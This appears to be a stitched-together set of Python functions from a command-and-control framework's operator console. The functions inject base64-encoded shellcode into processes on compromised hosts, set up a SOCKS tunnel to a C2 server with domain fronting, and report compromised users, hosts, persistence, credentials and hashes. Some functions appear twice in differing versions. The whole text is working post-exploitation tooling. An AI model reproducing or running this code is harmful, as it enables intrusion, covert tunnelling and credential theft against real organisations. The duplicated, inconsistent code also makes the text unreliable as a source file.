def do_migrate(user, command, randomuri): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) implant = get_implantdetails(randomuri) implant_arch = implant[10] implant_comms = implant[15] if implant_arch == "AMD64": arch = "64" else: arch = "86" if implant_comms == "C#": path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch) shellcodefile = load_file(path) elif "Daisy" in implant_comms: daisyname = input("Name required: ") path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, daisyname, arch) shellcodefile = load_file(path) elif "Proxy" in implant_comms: path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch) shellcodefile = load_file(path) new_task( "run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
def do_migrate(user, command, randomuri): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) implant = get_implantdetails(randomuri) implant_arch = implant[10] implant_comms = implant[15] if implant_arch == "AMD64": arch = "64" else: arch = "86" if implant_comms == "PS": path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, arch) shellcodefile = load_file(path) elif "Daisy" in implant_comms: daisyname = input("Name required: ") path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % ( PoshProjectDirectory, daisyname, arch) shellcodefile = load_file(path) elif "Proxy" in implant_comms: path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % ( PoshProjectDirectory, arch) shellcodefile = load_file(path) check_module_loaded("Inject-Shellcode.ps1", randomuri, user) new_task( "$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri) new_task( "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
def do_sharpsocks(user, command, randomuri): check_module_loaded("SharpSocks.ps1", randomuri, user) import string from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurl = select_item("PayloadCommsHost", "C2Server") sharpport = select_item("PayloadCommsPort", "C2Server") dfheader = select_item("DomainFrontHeader", "C2Server") implant = get_implantdetails(randomuri) pivot = implant[15] if pivot != "PS": sharpurl = input("Enter the URL for SharpSocks: ") if (sharpport != 80 and sharpport != 443): if (sharpurl.count("/") >= 3): pat = re.compile(r"(?<!/)/(?!/)") sharpurl = pat.sub(":%s/" % sharpport, str, 1) else: sharpurl = ("%s:%s" % (sharpurl, sharpport)) print(PoshInstallDirectory + "resources/SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri.lower() == "n": print("") if (ri == "") or (ri.lower() == "y"): taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls) if dfheader: taskcmd += " -DomainFrontURL %s" % dfheader new_task(taskcmd, user, randomuri) update_label("SharpSocks", randomuri)
def do_opsec(user, command): implants = get_implants_all() comtasks = get_tasks() hosts = "" uploads = "" urls = "" users = "" for i in implants: if i[3] not in hosts: hosts += "%s \n" % i[3] if i[9] not in urls: urls += "%s \n" % i[9] for t in comtasks: hostname = get_implantdetails(t[1]) command = t[2].lower() output = t[3].lower() if hostname[2] not in users: users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3]) if "invoke-pbind" in command and "connected" in output: tg = re.search("(?<=-target )\\S*", str(command)) if tg[0] not in hosts: hosts += "%s \n" % tg[0] if "uploading file" in command: uploadedfile = command uploadedfile = uploadedfile.partition( "uploading file: ")[2].strip() filehash = uploadedfile.partition(" with md5sum:")[2].strip() uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip() uploadedfile = uploadedfile.strip('"') uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile) if "installing persistence" in output: implant_details = get_implantdetails(t[2]) line = command.replace('\n', '') line = line.replace('\r', '') filenameuploaded = line.rstrip().split(":", 1)[1] uploads += "%s %s \n" % (implant_details[3], filenameuploaded) if "written scf file" in output: implant_details = get_implantdetails(t[2]) uploads += "%s %s\n" % (implant_details[3], output[output.indexof(':'):]) creds, hashes = parse_creds(get_creds()) print_good( "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes)) input("Press Enter to continue...") clear()
def do_kill_implant(user, command, randomuri): impid = get_implantdetails(randomuri) ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print("Implant not terminated") if ri == "": new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": new_task("exit", user, randomuri) kill_implant(randomuri)
def do_tasks(user, command): alltasks = "" tasks = get_newtasks_all() if tasks is None: print_good("No tasks queued!\r\n") else: for task in tasks: imname = get_implantdetails(task[1]) alltasks += "[%s] : %s | %s\r\n" % (imname[0], "%s\\%s" % (imname[11], imname[2]), task[2]) print_good("Queued tasks:\r\n\r\n%s" % alltasks) input("Press Enter to continue...") clear()
def do_modulesloaded(user, command, randomuri): implant_details = get_implantdetails(randomuri) print(implant_details[14]) new_task("listmodules", user, randomuri)
def do_modulesloaded(user, command, randomuri): ml = get_implantdetails(randomuri) print(ml[14])
def do_get_pid(user, command, randomuri): implant_details = get_implantdetails(randomuri) print(implant_details[8])